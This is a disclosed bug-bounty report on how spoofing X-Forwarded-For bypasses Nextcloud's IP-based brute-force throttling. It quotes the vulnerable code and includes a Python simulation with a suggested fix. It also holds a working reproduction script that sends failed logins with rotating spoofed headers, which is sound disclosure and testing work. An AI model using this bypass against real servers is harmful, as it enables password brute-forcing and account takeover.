Nextcloud: Bruteforce protection in password verification can be bypassed

HackerOne report 2230915, reported by taise (hackerone.com), disclosed 2023-10-29 07:37. Bounty: $100.
Tags: nextcloud, bruteforce, ip address-based, password verification, vulnerability, bug bounty

AI Score: 6.8 Medium (confidence: High). EPSS: 0.001 Low (percentile: 29.9%).

Summary:

Nextcloud Server implements its brute-force protection as IP address-based throttling: failed authentication attempts are counted per source IP address and further attempts from that address are delayed. The source IP address is obtained through the getRemoteAddress() function.

lib/public/IRequest.php

	public function getRemoteAddress(): string {
		// Start from the TCP peer address; it is only overridden when that peer is a trusted proxy.
		$remoteAddress = isset($this->server['REMOTE_ADDR']) ? $this->server['REMOTE_ADDR'] : '';
		$trustedProxies = $this->config->getSystemValue('trusted_proxies', []);

		if (\is_array($trustedProxies) && $this->isTrustedProxy($trustedProxies, $remoteAddress)) {
			$forwardedForHeaders = $this->config->getSystemValue('forwarded_for_headers', [
				'HTTP_X_FORWARDED_FOR'
				// only have one default, so we cannot ship an insecure product out of the box
			]);

			foreach ($forwardedForHeaders as $header) {
				if (isset($this->server[$header])) {
					// The header is scanned left to right, so the first (client-supplied)
					// entry that parses as an IP address wins.
					foreach (explode(',', $this->server[$header]) as $IP) {
						$IP = trim($IP);

						// remove brackets from IPv6 addresses
						if (str_starts_with($IP, '[') && str_ends_with($IP, ']')) {
							$IP = substr($IP, 1, -1);
						}

						if (filter_var($IP, FILTER_VALIDATE_IP) !== false) {
							return $IP;
						}
					}
				}
			}
		}

		// No trusted proxy, or no usable forwarded entry: fall back to the peer address.
		return $remoteAddress;
	}

When trusted_proxies is configured and the request arrives from one of those proxies, the IP address is taken from the X-Forwarded-For header (or whichever headers forwarded_for_headers lists): the header value is split on commas and the first entry that passes filter_var(FILTER_VALIDATE_IP) is returned. The leftmost entry is the one the client itself can supply, because a proxy that appends the real client address leaves any attacker-provided value in front of it.

An attacker who adds an X-Forwarded-For header containing any syntactically valid IP address therefore makes the throttler count failures against that address instead of the real one, and by changing the value on every request starts each attempt with a clean counter, bypassing the brute-force protection. This only works when the trusted proxy appends to an existing X-Forwarded-For header rather than overwriting it; a proxy that replaces the header leaves nothing for the attacker to control.
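The following Python model is an added example, not Nextcloud's code: it mirrors the getRemoteAddress() logic above, stands a minimal per-IP failure counter in for the server's bruteforce Throttler, and runs a batch of failed logins through both to show that a rotating X-Forwarded-For value lands every attempt in a fresh bucket. It also shows one hardening (the author's suggestion, not the project's fix) that walks the forwarded chain from the right and takes the first address that is not itself a trusted proxy. The proxy address 10.0.0.2, the trusted_proxies entry 10.0.0.0/8, the attacker address 198.51.100.7 and the spoofed 203.0.113.0/24 values are constructed from documentation ranges, and is_trusted_proxy() is a simplification of the PHP helper.

```python
import ipaddress

# Added example (not Nextcloud's code): Python mirror of getRemoteAddress(),
# a minimal per-IP throttler, and a simulation of the bypass. All addresses
# are constructed from documentation ranges.


def valid_ip(text: str) -> bool:
    """Equivalent of filter_var($IP, FILTER_VALIDATE_IP)."""
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def is_trusted_proxy(trusted_proxies: list, address: str) -> bool:
    """Simplified isTrustedProxy(): exact match or CIDR membership (assumption)."""
    if not valid_ip(address):
        return False
    addr = ipaddress.ip_address(address)
    for entry in trusted_proxies:
        if "/" in entry:
            if addr in ipaddress.ip_network(entry, strict=False):
                return True
        elif entry == address:
            return True
    return False


def unbracket(candidate: str) -> str:
    """Trim whitespace and strip the [] around IPv6 literals, as the PHP code does."""
    candidate = candidate.strip()
    if candidate.startswith("[") and candidate.endswith("]"):
        candidate = candidate[1:-1]
    return candidate


def resolve_remote_address(server: dict, trusted_proxies: list,
                           forwarded_headers=("HTTP_X_FORWARDED_FOR",)) -> str:
    """Vulnerable behaviour: the first valid entry of the forwarded header wins."""
    remote = server.get("REMOTE_ADDR", "")
    if is_trusted_proxy(trusted_proxies, remote):
        for header in forwarded_headers:
            value = server.get(header)
            if value is None:
                continue
            for candidate in value.split(","):
                candidate = unbracket(candidate)
                if valid_ip(candidate):
                    return candidate
    return remote


def resolve_remote_address_hardened(server: dict, trusted_proxies: list,
                                    forwarded_headers=("HTTP_X_FORWARDED_FOR",)) -> str:
    """Author's hardening (not the project's fix): walk the chain from the right,
    skip hops that are trusted proxies, and take the first other address. That is
    the entry the trusted proxy appended, so client-supplied entries further left
    are ignored. Assumes the proxy appends (or overwrites) X-Forwarded-For."""
    remote = server.get("REMOTE_ADDR", "")
    if not is_trusted_proxy(trusted_proxies, remote):
        return remote
    for header in forwarded_headers:
        value = server.get(header)
        if value is None:
            continue
        for candidate in reversed(value.split(",")):
            candidate = unbracket(candidate)
            if valid_ip(candidate) and not is_trusted_proxy(trusted_proxies, candidate):
                return candidate
    return remote


class Throttler:
    """Minimal per-IP failure counter in place of OC\\Security\\Bruteforce\\Throttler."""

    def __init__(self, max_attempts: int = 5):
        self.max_attempts = max_attempts
        self.failures = {}

    def is_throttled(self, ip: str) -> bool:
        return self.failures.get(ip, 0) >= self.max_attempts

    def register_failure(self, ip: str) -> None:
        self.failures[ip] = self.failures.get(ip, 0) + 1


def simulate_failed_logins(resolver, attempts: int = 20, spoof: bool = False,
                           attacker_ip="198.51.100.7", proxy_ip="10.0.0.2",
                           trusted_proxies=("10.0.0.0/8",)) -> int:
    """Return how many attempts hit an already-throttled address. The proxy is
    assumed to append the real client address, so a spoofed entry ends up first."""
    throttler = Throttler()
    throttled = 0
    for i in range(attempts):
        chain = [attacker_ip]
        if spoof:
            chain.insert(0, f"203.0.113.{i % 254 + 1}")  # fresh valid IP per attempt
        server = {"REMOTE_ADDR": proxy_ip, "HTTP_X_FORWARDED_FOR": ", ".join(chain)}
        ip = resolver(server, list(trusted_proxies))
        if throttler.is_throttled(ip):
            throttled += 1
        throttler.register_failure(ip)
    return throttled


if __name__ == "__main__":
    print("no header, vulnerable:", simulate_failed_logins(resolve_remote_address))
    print("spoofed,   vulnerable:", simulate_failed_logins(resolve_remote_address, spoof=True))
    print("spoofed,   hardened  :", simulate_failed_logins(resolve_remote_address_hardened, spoof=True))
```

With the vulnerable resolver, 15 of 20 unspoofed attempts are throttled and 0 of 20 spoofed ones; the hardened resolver keys all 20 on 198.51.100.7 again. The hardened variant is only safe when every hop in trusted_proxies is configured to append to or overwrite X-Forwarded-For; a proxy that passes the header through untouched defeats any server-side parsing.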

Steps to reproduce

  1. Set up a Nextcloud server behind a reverse proxy and list that proxy in trusted_proxies.
  2. Attempt to log in multiple times with incorrect passwords. Confirm that Throttler::sleepDelay() slows down the responses after a few failures.
  3. Add an X-Forwarded-For header with a syntactically valid IP address to the requests. The delay is eliminated and the brute-force protection is bypassed.
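The procedure above, as an added reproduction script that is not part of the original report: it sends repeated failed HTTP Basic logins to an instance behind a trusted proxy, first without and then with a rotating X-Forwarded-For header, and compares the response delays. The host and user name come from the command line; using the WebDAV root as an endpoint whose failed Basic authentication is counted by the throttler, the wrong password, and the 203.0.113.0/24 spoof range are assumptions.

```python
import base64
import ipaddress
import sys
import time
import urllib.error
import urllib.request
from typing import Optional

# Added reproduction script (not from the original report). Endpoint, user and
# the TEST-NET-3 spoof range are assumptions; run only against a server you own.


def rotating_xff(i: int) -> str:
    """Distinct, syntactically valid IPv4 for attempt i (wraps after 254)."""
    return str(ipaddress.IPv4Address("203.0.113.0") + (i % 254 + 1))


def basic_auth_header(user: str, password: str) -> str:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def timed_failed_login(base_url: str, user: str, xff: Optional[str] = None,
                       timeout: float = 60.0):
    """One deliberately wrong-password request; returns (status, seconds)."""
    headers = {"Authorization": basic_auth_header(user, "definitely-wrong-password")}
    if xff is not None:
        headers["X-Forwarded-For"] = xff
    # Assumption: the WebDAV root authenticates with Basic auth and failures are throttled.
    req = urllib.request.Request(base_url.rstrip("/") + "/remote.php/dav/", headers=headers)
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code  # 401 is the expected answer for a wrong password
    return status, time.monotonic() - start


def probe(base_url: str, user: str, attempts: int = 8, spoof: bool = False):
    """Run `attempts` failed logins, printing and returning the per-request delay."""
    timings = []
    for i in range(attempts):
        xff = rotating_xff(i) if spoof else None
        status, seconds = timed_failed_login(base_url, user, xff)
        timings.append(seconds)
        print(f"attempt {i + 1:2d} xff={str(xff):<14} status={status} {seconds:6.2f}s")
    return timings


def bypass_detected(baseline, spoofed, ratio: float = 4.0) -> bool:
    """True when the slow tail of the run without the header is at least `ratio`
    times slower than the median spoofed request, i.e. the delay went away."""
    tail = sorted(baseline[len(baseline) // 2:])
    spoofed_sorted = sorted(spoofed)
    tail_median = tail[len(tail) // 2]
    spoofed_median = spoofed_sorted[len(spoofed_sorted) // 2]
    return tail_median >= ratio * max(spoofed_median, 1e-3)


if __name__ == "__main__":
    base_url, user = sys.argv[1], sys.argv[2]
    print("-- step 2: no X-Forwarded-For, expect growing delays")
    baseline = probe(base_url, user)
    print("-- step 3: rotating X-Forwarded-For, expect the delay to vanish")
    spoofed = probe(base_url, user, spoof=True)
    print("bypass detected:", bypass_detected(baseline, spoofed))
```

Run it as `python3 repro.py https://cloud.example.test alice` (both values are placeholders). The second run deliberately follows the first, so the real client address is already throttled when the spoofed requests go out; if the proxy overwrites X-Forwarded-For instead of appending, the spoofed run stays slow and bypass_detected() returns False.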

Impact

An attacker can bypass the brute-force protection and brute-force user passwords against the login, provided the server sits behind a trusted proxy that appends the client address to X-Forwarded-For.
